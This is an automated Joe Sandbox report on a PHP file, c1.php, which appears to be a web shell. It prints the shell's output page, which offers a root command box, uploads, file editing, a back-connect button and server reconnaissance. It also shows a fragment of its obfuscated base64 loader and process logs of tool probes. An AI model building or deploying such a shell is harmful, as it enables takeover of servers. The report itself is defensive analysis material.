Edit tour
Linux
Analysis Report
c1.php
Overview
General Information
Sample name: | c1.php |
Analysis ID: | 1559579 |
MD5: | 6a68768c7f6cfdece23f0a0a7e52459f |
SHA1: | 06fb75d44661e5594f2232a3d9df2193624a5ecc |
SHA256: | e15cb76a4b1c24809328b1405766b00ac3e3b629fc3c8974efd61a677fbb821c |
Infos: |
Detection
Score: | 3 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Compiles software using common tools
Creates hidden files and/or directories
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "python" command used to interpret Python scripts
Executes the "wget" command typically used for HTTP/S downloading
Reads the 'hosts' file potentially containing internal network hosts
Uses the "uname" system call to query kernel version information (possible evasion)
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1559579 |
Start date and time: | 2024-11-20 17:24:13 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 3m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) |
Analysis Mode: | default |
Sample name: | c1.php |
Detection: | CLEAN |
Classification: | clean3.linPHP@0/0@1/0 |
- VT rate limit hit for: c1.php
Command: | php "/tmp/c1.php" |
PID: | 4677 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | <!DOCTYPE html> <html> <head> <title>404</title> <link rel="stylesheet" href="https://rawcdn.githack.com/Jenderal92/Blog-Gan/63073e604b81df6337c1917990a7330d46b22ae9/ganteng.css"> </head> <body> <div class="container"> <h1>[ Avaa Bypassed ]</h1> <div class="menu-icon" onclick="toggleSidebar()"></div> <hr> <div class="button-container"> <form method="post" style="display: inline-block;"> <input type="submit" name="Summon" value="Adminer" class="summon-button"> </form> <button type="button" onclick="window.location.href='?gas'" class="summon-button">Mail Test</button> <button type="button" onclick="window.location.href='?do=bc'" class="summon-button">BC</button> <button type="button" onclick="window.location.href='?dir=/tmp&goo=config'" class="summon-button">Config</button> </div> <hr> <select onchange="location.href = this.value;"> <option value="" selected disabled>Create File Or Folder</option> <option value="?dir=/tmp&create=file">Create File</option> <option value="?dir=/tmp&create=folder">Create Folder</option> </select> <select onchange="location.href = this.value;"> <option value="" selected disabled>Zipping</option> <option value="?dir=/tmp&hahay=unzip" >Un ZIP</option> <option value="?dir=/tmp&hahay=extract_zip" >Extract ZIP</option> </select> <hr> <div class="upload-cmd-container"> <div class="upload-form"> <h2>Upload:</h2> <form method="post" enctype="multipart/form-data"> <input type="file" name="file"> <button class="button" type="submit" name="upload">Upload</button> </form> </div> <div class="cmd-form"> <h2>Command:</h2> <form method="post"> root@: ~ $<input type='text' size='30' height='10' name='cmd'> <input type="submit" class="empty-button"> </form> </div> </div> <hr> </div> <center><h2>Filemanager</h2> <div class="breadcrumb"> DIR : <a href="?dir=/">/</a> <a href="?dir=%2Ftmp">tmp</a>/ </div> <table> <tr> <th>Name</th> <th>Type</th> <th>Size</th> <th>Permission</th> <th>Actions</th> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.ICE-unix">.ICE-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.ICE-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.ICE-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.ICE-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.Test-unix">.Test-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.Test-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.Test-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.Test-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.X11-unix">.X11-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.X11-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.X11-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.X11-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.XIM-unix">.XIM-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.XIM-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.XIM-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.XIM-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.font-unix">.font-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.font-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.font-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.font-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2Fhsperfdata_root">hsperfdata_root</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">0755</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=hsperfdata_root">Rename</option> <option value="?dir=%2Ftmp&chmod=hsperfdata_root">Chmod</option> <option value="?dir=%2Ftmp&delete=hsperfdata_root">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2Fsystemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo">systemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">0700</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo">Rename</option> <option value="?dir=%2Ftmp&chmod=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo">Chmod</option> <option value="?dir=%2Ftmp&delete=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2Fsystemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT">systemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">0700</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT">Rename</option> <option value="?dir=%2Ftmp&chmod=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT">Chmod</option> <option value="?dir=%2Ftmp&delete=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2Fvmware-root">vmware-root</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">0700</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=vmware-root">Rename</option> <option value="?dir=%2Ftmp&chmod=vmware-root">Chmod</option> <option value="?dir=%2Ftmp&delete=vmware-root">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2F.X0-lock">.X0-lock</a></td> <td> File</td> <td>11 B</td> <td> <span style="color: green">0444</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2F.X0-lock">Edit</option> <option value="?dir=%2Ftmp&rename=.X0-lock">Rename</option> <option value="?dir=%2Ftmp&chmod=.X0-lock">Chmod</option> <option value="?dir=%2Ftmp&delete=.X0-lock">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2F.xfsm-ICE-TWMPB2">.xfsm-ICE-TWMPB2</a></td> <td> File</td> <td>406 B</td> <td> <span style="color: green">0600</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2F.xfsm-ICE-TWMPB2">Edit</option> <option value="?dir=%2Ftmp&rename=.xfsm-ICE-TWMPB2">Rename</option> <option value="?dir=%2Ftmp&chmod=.xfsm-ICE-TWMPB2">Chmod</option> <option value="?dir=%2Ftmp&delete=.xfsm-ICE-TWMPB2">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2Fc1.php">c1.php</a></td> <td> File</td> <td>177.21 KB</td> <td> <span style="color: green">0777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2Fc1.php">Edit</option> <option value="?dir=%2Ftmp&rename=c1.php">Rename</option> <option value="?dir=%2Ftmp&chmod=c1.php">Chmod</option> <option value="?dir=%2Ftmp&delete=c1.php">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2Fconfig-err-Tiv1RD">config-err-Tiv1RD</a></td> <td> File</td> <td>0 B</td> <td> <span style="color: green">0600</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2Fconfig-err-Tiv1RD">Edit</option> <option value="?dir=%2Ftmp&rename=config-err-Tiv1RD">Rename</option> <option value="?dir=%2Ftmp&chmod=config-err-Tiv1RD">Chmod</option> <option value="?dir=%2Ftmp&delete=config-err-Tiv1RD">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2Fdmesgtail.log">dmesgtail.log</a></td> <td> File</td> <td>283 B</td> <td> <span style="color: green">0777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2Fdmesgtail.log">Edit</option> <option value="?dir=%2Ftmp&rename=dmesgtail.log">Rename</option> <option value="?dir=%2Ftmp&chmod=dmesgtail.log">Chmod</option> <option value="?dir=%2Ftmp&delete=dmesgtail.log">Delete</option> </select> </div> </td> </tr> </table> </center> </div> <div class="sidebar" id="sidebar"> <div class="sidebar-content"> <div class="sidebar-close"> <button onclick="toggleSidebar()">Close</button> </div> <div class="info-container"> <h2>Server Info</h2> <ul class="info-list"> <li>Hostname: ubuntu</li> <li>PHP Version: 7.0.33-0ubuntu0.16.04.4</li> <li>Server Software: </li> <li>HDD Total Space: 8.78 GB</li> <li>HDD Free Space: 3.4 GB</li> <li>Total Domains in Server: 0</li> <li>System: Linux ubuntu 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64</li> </ul> </div> <div class="info-container"> <h2>System Info</h2> <ul class="info-list"> <label for="feature-select">Select Feature:</label> <select id="feature-select"> <option value="Safe Mode">Safe Mode: Disabled</option> <option value="Disable Functions">Disable Functions: </option> <option value="GCC">GCC: On</option> <option value="Perl">Perl: On</option> <option value="Python Version">Python Version: Off</option> <option value="PKEXEC Version">PKEXEC Version: On (pkexec version 0.105 )</option> <option value="Curl">Curl: On</option> <option value="Wget">Wget: On</option> <option value="Mysql">Mysql: Off</option> <option value="Ftp">Ftp: Off</option> <option value="Ssh">Ssh: Off</option> <option value="Mail">Mail: Off</option> <option value="cron">cron: Off</option> <option value="SendMail">SendMail: Off</option> </select> </ul> </div> <div class="info-container"> <h2>User Info</h2> <ul class="info-list"> <li>Username: root</li> <li>User ID: 0</li> <li>Group ID: 0</li> </ul> </div> </div> </div> <script> function toggleOptionsMenu() { var optionsMenu = document.getElementById('optionsMenu'); optionsMenu.classList.toggle('show'); } function toggleSidebar() { var sidebar = document.getElementById('sidebar'); sidebar.classList.toggle('open'); } </script> </div> <div class="footer"> <p>© 2024 <a href="https://www.blog-gan.org/">Coded By</a> Avaa Code.</p> </div> </body> </html> |
Standard Error: | PHP Notice: Undefined variable: z in /tmp/c1.php on line 2 Python 2.7.12 sh: 1: mysql: not found sh: 1: ftp: not found unknown option -- - usage: ssh [-1246AaCfGgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-L address] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command] sh: 1: mail: not found cron: invalid option -- '-' usage: cron sh: 1: sendmail: not found |
- system is lnxubuntu1
- php New Fork (PID: 4684, Parent: 4677)
- dash New Fork (PID: 4685, Parent: 4684)
- php New Fork (PID: 4693, Parent: 4677)
- dash New Fork (PID: 4698, Parent: 4693)
- php New Fork (PID: 4710, Parent: 4677)
- dash New Fork (PID: 4712, Parent: 4710)
- php New Fork (PID: 4720, Parent: 4677)
- dash New Fork (PID: 4726, Parent: 4720)
- php New Fork (PID: 4740, Parent: 4677)
- dash New Fork (PID: 4743, Parent: 4740)
- php New Fork (PID: 4754, Parent: 4677)
- dash New Fork (PID: 4755, Parent: 4754)
- php New Fork (PID: 4762, Parent: 4677)
- php New Fork (PID: 4769, Parent: 4677)
- php New Fork (PID: 4778, Parent: 4677)
- dash New Fork (PID: 4781, Parent: 4778)
- php New Fork (PID: 4796, Parent: 4677)
- php New Fork (PID: 4797, Parent: 4677)
- dash New Fork (PID: 4798, Parent: 4797)
- php New Fork (PID: 4799, Parent: 4677)
- cleanup
⊘No yara matches
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
There are no malicious signatures, click here to show all signatures.
Source: | Wget executable: | Jump to behavior |
Source: | Reads hosts file: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | Classification label: |
Source: | Systemctl executable: | Jump to behavior |
Source: | Directory: | Jump to behavior |
Source: | Curl executable: | Jump to behavior |
Source: | Python executable: | Jump to behavior |
Source: | Wget executable: | Jump to behavior |
Source: | Stderr: PHP Notice: Undefined variable: z in /tmp/c1.php on line 2Python 2.7.12sh: 1: mysql: not foundsh: 1: ftp: not foundunknown option -- -usage: ssh [-1246AaCfGgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-L address] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]sh: 1: mail: not foundcron: invalid option -- '-'usage: cronsh: 1: sendmail: not found: |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | Path Interception | 1 Hidden Files and Directories | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
⊘No created / dropped files found
File type: | |
Entropy (8bit): | 4.4859831414848275 |
TrID: | |
File name: | c1.php |
File size: | 181'468 bytes |
MD5: | 6a68768c7f6cfdece23f0a0a7e52459f |
SHA1: | 06fb75d44661e5594f2232a3d9df2193624a5ecc |
SHA256: | e15cb76a4b1c24809328b1405766b00ac3e3b629fc3c8974efd61a677fbb821c |
SHA512: | 9777c7ce9d6b259a701eb89ccaae7e0c0d87b7eee642099719c6bbccad1ae493b3c48344eb1172cf32cfdc015764bf777309a35bd3035cbef8164d89cb99c05d |
SSDEEP: | 1536:1PP/WT49Y9WqJ8ll6TJufgrFu0F30QA7VeZGBAZY10J:1H6vKb6EgZE30ZGOYKJ |
TLSH: | 01041DF719052F5F42601F21FCDD240ECAF52866EAAD1B95D42B3DEC23EA90CDA61817 |
File Content Preview: | <?php.$z .= "DQpA";.$z .= "aW5p";.$z .= "X3Nl";.$z .= "dCgn";.$z .= "ZXJy";.$z .= "b3Jf";.$z .= "bG9n";.$z .= "Jywg";.$z .= "TlVM";.$z .= "TCk7";.$z .= "DQpA";.$z .= "aW5p";.$z .= "X3Nl";.$z .= "dCgn";.$z .= "bG9n";.$z .= "X2Vy";.$z .= "cm9y";.$z .= "cycs |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 17:24:48.674849033 CET | 48361 | 53 | 192.168.2.20 | 8.8.8.8 |
Nov 20, 2024 17:24:48.808690071 CET | 53 | 48361 | 8.8.8.8 | 192.168.2.20 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 17:24:48.674849033 CET | 192.168.2.20 | 8.8.8.8 | 0xd69 | Standard query (0) | 256 | 256 | false |
System Behavior
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | /usr/bin/php /tmp/c1.php |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "gcc --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/gcc |
Arguments: | gcc --version |
File size: | 5 bytes |
MD5 hash: | e6f247b5be7f94b21850d0838afbb7bc |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "perl --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/perl |
Arguments: | perl --version |
File size: | 1911288 bytes |
MD5 hash: | 3bff1a7d2eef76ecdd800360d896366b |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "python --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/python |
Arguments: | python --version |
File size: | 9 bytes |
MD5 hash: | fdfa6acc26b1a187ba86772f74812876 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "pkexec --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/pkexec |
Arguments: | pkexec --version |
File size: | 23376 bytes |
MD5 hash: | 08328503c3dafada668903d0a094f11f |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "curl --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/curl |
Arguments: | curl --version |
File size: | 190408 bytes |
MD5 hash: | 3ed0bf9e05e319049a9a40e645ef4b73 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "wget --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/wget |
Arguments: | wget --version |
File size: | 474656 bytes |
MD5 hash: | acaead6d3c5bcc35a12ab496fa834365 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "mysql --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "ftp --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
